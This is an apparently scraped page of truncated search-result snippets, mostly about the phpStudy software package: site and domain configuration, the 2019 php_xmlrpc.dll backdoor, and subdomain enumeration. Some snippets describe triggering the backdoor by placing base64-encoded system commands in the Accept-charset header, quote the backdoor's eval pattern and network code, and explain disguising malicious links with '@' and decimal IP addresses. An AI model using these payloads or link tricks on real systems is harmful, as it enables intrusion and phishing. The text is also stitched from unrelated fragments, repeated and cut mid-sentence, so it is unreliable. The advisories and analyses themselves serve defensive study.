站长前面推荐过《phpStudy:非常棒的PHP环境搭建包(支持Apache、IIS、Nginx和LightTPD) 》,今天来简单介绍一下使用 phpStudy 创建多个站点,绑定域名的方法。...默认情况下,phpStudy 的站点根目录是在它自己的WWW目录,比如 F:\phpStudy\WWW,访问的地址可以是 http://127.0.0.1/ 或 http://localhost/...注:本文解说的是 phpStudy 完整版的,其他版本可能行不通或不一样。...1.打开 phpStudy ,在“其他选项”那里点击“站点域名设置” 2.看到如下界面,填写网站域名(随意写,建议不要写你经常访问的线上域名),然后选择网站目录(可以随意目录,但是不要使用中文),然后点击...【新增】,然后点击【保存设置并生成配置文件】,重启环境就可以生效了 3.上面我们填写的域名,我们希望是直接访问我们本地的网站,要实现这个目的,我们需要修改一下自己电脑里的 hosts 文件,将域名指定到
本文介绍了phpStudy配置多站点多域名和多端口的方法,分享给大家,也给自己留个笔记 WWW目录下有三个项目目录: a b c Apache 默认httpd端口为 80,网站目录为D:WWWa...1.配置多域名多站点 第一步:点击“其他选项菜单”=>站点域名管理=>设置如下三个站点域名: (1)网站域名:a.com 网站目录:D:WWWa 网站端口:80 (2)网站域名:b.com 网站目录...:D:WWWb 网站端口:80 (3)网站域名:c.com 网站目录:D:WWWc 网站端口:80 保存配置并生成配置文件; 第二步:打开hosts.txt文件,在文件末尾加上如下内容: 127.0.0.1...80 2.配置多端口 第一步设置改为: (1)网站域名:a.com 网站目录:D:WWWa 网站端口:80 (2)网站域名:b.com 网站目录:D:WWWb 网站端口:81 (3)网站域名:c.com...,打开vhosts.conf配置文件,查看是否有如下内容: DocumentRoot "D:WWWa" ServerName a.com ServerAlias phpStudy.NET
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE...安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。...该后门文件是PHP环境当中的php_xmlrpc.dll模块被植入木马后门,具体的名称,经过我们SINE安全技术的安全检测,可以确定是phpstudy2016.11.03版本,以及phpstudy2018.02.11...关于phpstudy漏洞的修复办法,从phpstudy官方网站下载最新的版本,将php_xmlrpc.dll进行替换到旧版本里即可,对PHP的Accept-Charset的参数传输做安全过滤与效验防止提交恶意参数...,禁止代码的传输,即可修复此漏洞,(经证实对此phpstudy官方公告此后门是黑客之前入侵了官网篡改了程序包导致的安全问题,强烈鄙视黑客的行为!)
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立...phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。...该后门文件是PHP环境当中的php_xmlrpc.dll模块被植入木马后门,具体的名称,经过我们SINE安全技术的安全检测,可以确定是phpstudy2016.11.03版本,以及phpstudy2018.02.11...关于phpstudy漏洞的修复办法,从phpstudy官方网站下载最新的版本,将php_xmlrpc.dll进行替换到旧版本里即可,对PHP的Accept-Charset的参数传输做安全过滤与效验防止提交恶意参数...,禁止代码的传输,即可修复此漏洞,(经证实对此phpstudy官方公告此后门是黑客之前入侵了官网篡改了程序包导致的安全问题,强烈鄙视黑客的行为!)
用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。...还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...,却发现不存在后门: phpStudy20161103.zip压缩包md5:5bf5f785f027bf0c99cd02692cf7c322 phpStudy20161103.exe md5码:...对美国受影响的目标进行简单的探查发现基本都是属于IDC机房的机器,猜测都是国人在购买的vps上搭建的PhpStudy。...知道创宇云防御数据 知道创宇404积极防御团队检测到2019/09/24开始,互联网上有人开始对PhpStudy后门中的RCE进行利用。
葫芦的运维日志 curl 测试域名解析是否被劫持: -v 参数可以显示一次 http 通信的整个过程,包括端口连接和 http request 头信息。
用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。...还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2....,却发现不存在后门: phpStudy20161103.zip压缩包md5:5bf5f785f027bf0c99cd02692cf7c322 phpStudy20161103.exe md5码:...ZoomEye数据 通过ZoomEye探测phpstudy可以使用以下dork: 1."...对美国受影响的目标进行简单的探查发现基本都是属于IDC机房的机器,猜测都是国人在购买的vps上搭建的PhpStudy。 4.
0x01 Sublist3r:子域名快速枚举工具 安装: git clone https://github.com/aboul3la/Sublist3r.git ?...常用参数: 枚举特定域名的子域: python sublist3r.py -d baidu.com ?...只枚举开放80端口443的子域,我们可以非常有效的去筛选值得测试的子域 : python sublist3r.py -d http://baidu.com -p 80,443 -v ?...使用特定的引擎去枚举子域名,比如百度,雅虎,threadcrowd,virustotal,等: python sublist3r.py -e threatcrowd,yahoo,virustotal,netcraft...划重点啦~ 我们在子域名信息搜集的过程中,如果只使用一个工具去搜集子域名信息,可能搜集到的信息会不够全面,因此我们可以把这三个工具结合起来使用~ 为了方便大家的使用,写了个小脚本来调用这三个工具,以方便我们后续的信息搜集
复现环境 phpstudy2016 +win10 复现过程 启动有漏洞的phpstudy pcat的检测脚本如下 python版本: # -*- coding:utf8 -*- __author__='...dirs: pcheck(os.path.join(path, name)) pass if __name__ == '__main__': foo() 放在phpstudy...5.4.45\ext\php_xmlrpc.dll === @eval(%s('%s')); %s;@eval(%s('%s')); [Finished in 10.2s] 可以发现 主要是这两个版本的phpstudy...Administrator" or "DefaultAccount" in r.text: # # print(r.text) # else: # print("不存在phpstudy...后门") # if len(sys.argv) < 2: # print("python phpstudy.py http://127.0.0.1") # else: # Poc(sys.argv
很多人应该都遇到了在使用phpStudy本地环境测试软件时候打开很慢的问题,甚至动辄达到了1000ms以上,开篇直接给出解决办法: 下面给大家介绍phpstudy访问速度慢的解决办法。...1、修改mysql数据库链接地址为ip地址127.0.0.1 (就是把测试网站里的数据库信息配置文件内的localhost修改为127.0.0.1,可能一般习惯于填写localhost了,但这里就必须改
此文不太适合一点不懂多站点多域名的。适合于碰到难处了,一点就透。ok。比较随意。 首先,打开站点域名管理,配置如下,网站域名和目录都可以自己设置,端口重设一个,不要是80了,然后先新增再保存。...域名配好了。。此时又有问题了 浏览器出这样的页面但是当你输入www.test.com/index.php时就可以访问index.php的程序需要写完整路径。。。。怎么破。。。...这个问题就解决了(有时不需要注释掉,按自己的情况来)好像是静态网站需要注释,动态网站不要注释 再添一句自己的 访问的时候带上端口 如:http://www.aaa.com:801/ 以上所述是小编给大家介绍的phpStudy...配置多站点多域名方法及遇到的403错误解决方法,希望对大家有所帮助,
---- 下载和安装 先wget下载 wget -c http://lamp.phpstudy.net/phpstudy.bin 再给对应的权限(自己服务器,暂时自己用,所以暂时744权限) chmod...744 phpstudy.bin (文档上是 chmod +x phpstudy.bin, 自己简单操作) 最后安装 ..../phpstudy.bin 安装的时候,需要选择php版本,以及 服务器类型 ? 自己简单选取 5, a 后 (也就是 5.5, apache) 就自动进行安装了 ?.../phpstudy.bin 但是你会发现有一行是否安装mysql提示 选不安装 这样只需要编译nginx+php5.4 【phpstudy还是蒲老师很早介绍的, 应该有快2年了,感谢:)】 ---...卸载phpstudy的方法 ? 重启 ? vhost添加 ? vhost删除 ?
Dig是一个非常强大的命令行工具,用于在Linux和其他类Unix操作系统上测试DNS服务器的功能和性能。...在本文中,我们将介绍Dig命令的基本语法和用法,以及如何使用Dig来测试域名解析。...MX如何使用Dig测试域名解析Dig命令非常适合测试域名解析。...下面是一些示例,演示如何使用Dig测试域名解析。查询A记录要查询域名的A记录,请使用以下命令:$ dig example.com A该命令将显示与域名“example.com”关联的IP地址列表。...查询NS记录要查询域名的NS记录,请使用以下命令:$ dig example.com NS该命令将显示与域名“example.com”关联的DNS服务器的名称。
影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45...更多漏洞细节参考文章:PHPStudy后门事件分析 0x02 环境准备 本次漏洞复现的演示靶场为phpStudy 2018中的php-5.2.17+Apache环境 phpStudy 2018 后门版...:点击下载 提取码:nlnq 靶机环境搭建成功后,即可访问phpinfo页面 0x03 漏洞检测 phpStudy的后门问题代码存在于以下路径文件中 # phpStudy2016路径 php\php...发现漏洞 BurpSuite是在做渗透测试时必不可少的抓包工具,因此利用BurpSuite的扩展插件在抓取数据包时进行自动分析检测,非常便捷。...手工验证 用BurpSuite将存在漏洞的数据包发送至Repeater模块进行测试,只需修改数据包中如下两处位置即可 # 将要执行的代码进行Base64编码,例如:system('whoami'); Accept-charset
本文为看雪论坛优秀文章 看雪论坛作者ID:lipss PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。...影响版本 Phpstudy 2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll Phpstudy 2018...PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 分析过程 1、定位特征字符串位置 2、静态分析传参数据 3、动态调试构造传参内容 php_xmlrpc.dll PHPstudy...动态调试构造传参内容 OD动态调试传参值需要对httpd.exe进程进行附加调试,phpstudy启用的httpd进程有两个。一个是带有参数的,一个是没有带参数的。...\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); } 脚本二功能: 内置有域名表和端口表
0x01:前言 近日,phpStudy被公告疑似遭遇黑客攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,经网友确认phpStudy2016、phpStudy2018的部分版本有后门...0x02:预防 phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll
问题概要 有问题的版本如下 phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本 php5.4.45...环境准备 本次使用的是之前下载安装在本地的phpStudy20180211官网版本 官网下载地址 phpStudy 2018版本下载及更新日志 - phpStudy交流社区 https://www.xp.cn
作者:lu4nx@知道创宇404积极防御实验室 作者博客:《使用 Ghidra 分析 phpStudy 后门》 原文链接:https://paper.seebug.org/1058/ 这次事件已过去数日...1 工具和平台 主要工具: Kali Linux Ghidra 9.0.4 010Editor 9.0.2 样本环境: Windows7 phpStudy 20180211 2 分析过程 先在 Windows...7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。.../PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll 单独拷贝出来,再确认下是否存在后门: lu4nx@lx-kali:/tmp/phpStudy$ strings...《phpStudy 遭黑客入侵植入后门事件披露 | 微步在线报告》 《PhpStudy 后门分析》,作者:Hcamael@知道创宇 404 实验室
今天在《网络渗透测试--保护网络安全的技术、工具、过程》一书中看到了一个关于对恶意链接进行域名伪装的方法,以前从不知道的一个方法,特此记录下来: 我们通常使用的都是以下这种格式的域名: www.example.com...浏览器在将域名发往dns服务器之前,会先对域名进行第一步处理,这里就涉及到一个隐含的知识:“@”符号 如果在浏览器地址栏中输入一个包含“@”符号的域名,浏览器在发送该域名之前,会自动忽略“@”符号之前的所有内容...下面我们就来对后面的恶意域名进行伪装: 所有的域名,其实都对应着一个ip地址,我们可以将域名转换为iP地址,但这还是一个非常愚昧的伪装方式,不可信的原因自不必说,和上面一样。...我们还有另一种方式: 其实每个iP地址都可以转化为一个十进制数,这个十进制数同样会被域名服务器(DNS Server)解析到对应的ip 我们在这里举个简单的例子,假设ip为172.168.23.113。...(这个ip在现实网络中是不可被路由的,这里我们仅仅用来作为演示举例使用,请遵守响应的法律法规) 现在的ip4是由4组三位十进制数组成的 对于172.168.23.113这个域名进行对应十进制转化的方法如下
打开站点域名管理 填写站点管理内容,然后点击新增,左侧会增加更才填写的内容,然后点击保存设置并生产配置文件 修改hosts本地映射 Paste_Image.png
领取专属 10元无门槛券
手把手带您无忧上云